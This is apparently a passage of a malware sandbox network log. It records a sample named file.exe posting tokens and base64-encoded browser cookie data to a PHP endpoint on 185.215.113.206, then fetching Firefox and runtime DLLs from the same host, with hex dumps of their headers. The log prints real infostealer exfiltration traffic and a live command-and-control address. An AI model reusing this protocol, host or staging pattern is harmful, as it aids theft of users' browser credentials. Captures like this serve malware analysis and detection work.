                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="file"------HJDGCGDBGCAAEBFIECGH--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.920258045 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:30 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    2192.168.2.749785185.215.113.206805788C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:36.958857059 CET633OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKE
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 431
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 52 57 52 6e 5a 56 39 45 5a 57 5a 68 64 57 78 30 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file_name"Y29va2llc1xNaWNyb3NvZnQgRWRnZV9EZWZhdWx0LnR4dA==------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------GCAFCAFHJJDBFIECFBKE--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.775926113 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:38 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.928060055 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGII
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 363
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="file"------FCFBGIDAEHCFIDGCBGII--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.867923021 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:39 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.470901012 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915287971 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:40 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 685392
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915359974 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                                                                                    Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915369987 CET248INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                                                                                    Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915427923 CET1236INData Raw: 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 00 00 89 c3 88 44 24 07 8b 44 24 40 89 cf 89 4c 24 14 0f b6 c9 c1 e1 18
                                                                                                                                                                                                                                                                                                                    Data Ascii: 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$\$\$T$1%1%1T$D|$@|$t\$(D$\$(sFD$,D$
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915440083 CET1236INData Raw: 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 c1 f8 1f f7 d0 8b 5d 1c 80 7c 33 f5 01 19 ff 09 c7 b8 03 00 00 00 29 c8
                                                                                                                                                                                                                                                                                                                    Data Ascii: EE|0)U|2!!)]|3)|3!)}|7!!)U|2)|2!!)M|1t/EU;U]w"1E9t:RVP -
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915595055 CET1236INData Raw: 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83 c4 08 85 c0 74 2c 8b 1f 85 db 74 14 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 c7 47 08 01
                                                                                                                                                                                                                                                                                                                    Data Ascii: EGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915606022 CET1236INData Raw: 31 e9 e8 29 f6 07 00 89 f0 81 c4 04 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 b4 30 0a 10 31 e8 89 45 f0 68 02 01 00 00 e8 9f f7 07 00 83 c4 04 31 ff 85 c0 0f 84 fc 00 00 00 89 c6 8b 45 0c
                                                                                                                                                                                                                                                                                                                    Data Ascii: 1)^_[]USWV01Eh1E=s hkhVohh !Vf.@uVuW)9wSuWT
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915616035 CET1236INData Raw: 89 cf 8b 45 f0 88 14 30 00 d3 0f b6 c3 8b 4d 10 8a 51 02 8b 4d f0 32 14 01 8b 4d d4 8b 45 e4 88 50 02 8b 5d dc 8b 45 d0 8b 55 d8 2b 55 cc 89 55 d8 83 c7 04 83 c3 04 8b 55 e0 39 d1 0f 86 c9 01 00 00 29 d1 0f 84 de 01 00 00 89 5d dc 89 7d e4 89 c8
                                                                                                                                                                                                                                                                                                                    Data Ascii: E0MQM2MEP]EU+UUU9)]}1EEMAMfo 1ff}]fn4ff`fafofrfo f[fpffpffof
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.915628910 CET620INData Raw: 88 14 18 8b 5d dc 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 18 09 f0 8b 75 d8 33 45 d4 8b 55 e8 89 04 13 8b 45 e8 83 c6 fc 83 c0 04 89 75 d8 83 fe 03 0f 87 f0 fe ff ff 8b 7d ec 01 c7 8b 55 e4 01 c2 89 c6 89 d0 01 f3 89 ca 83 7d d8 00 0f 84 03 02
                                                                                                                                                                                                                                                                                                                    Data Ascii: ]Uu3EUEu}U}]E]E8u40480u}T20ETEuE14^_[]UM1]U}f.MM
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.921629906 CET1236INData Raw: ff 8b 45 ec 04 07 89 45 ec 0f b6 c0 8b 7d f0 8a 0c 07 00 ce 0f b6 f6 8a 2c 37 88 2c 07 88 0c 37 00 cd 8b 45 10 8a 40 06 0f b6 cd 32 04 0f 88 43 06 8b 4d ec e9 2e f7 ff ff cc cc cc 55 89 e5 53 57 56 81 ec 5c 01 00 00 89 8d dc fe ff ff 8b 32 89 95
                                                                                                                                                                                                                                                                                                                    Data Ascii: EE},7,7E@2CM.USWV\2tRAA q$]QD1A@1RQP5}gjM31tQI
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.921688080 CET1236INData Raw: 89 f2 8b 85 74 ff ff ff 8b 70 48 89 b5 38 ff ff ff 8b 7d b4 01 f7 8b 70 4c 89 b5 14 ff ff ff 11 f3 89 f8 01 d0 89 d7 89 45 b4 11 cb 89 5d c8 8b b5 64 ff ff ff 31 de 8b 5d 94 31 c3 89 da 0f a4 f2 10 89 55 b0 0f ac f3 10 89 5d 94 8b 75 ec 01 de 89
                                                                                                                                                                                                                                                                                                                    Data Ascii: tpH8}pLE]d1]1U]uuEE11E}tBP`MBTD]HM}]u1uP1Euu11}tOX EO\H
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.360616922 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.803764105 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:42 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 608080
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.658776999 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.961302996 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:44.101115942 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:43 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 450024
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:44.749564886 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:45.192698002 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:44 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 2046288
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:48.246887922 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:48.689899921 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 257872
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:49.346853018 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
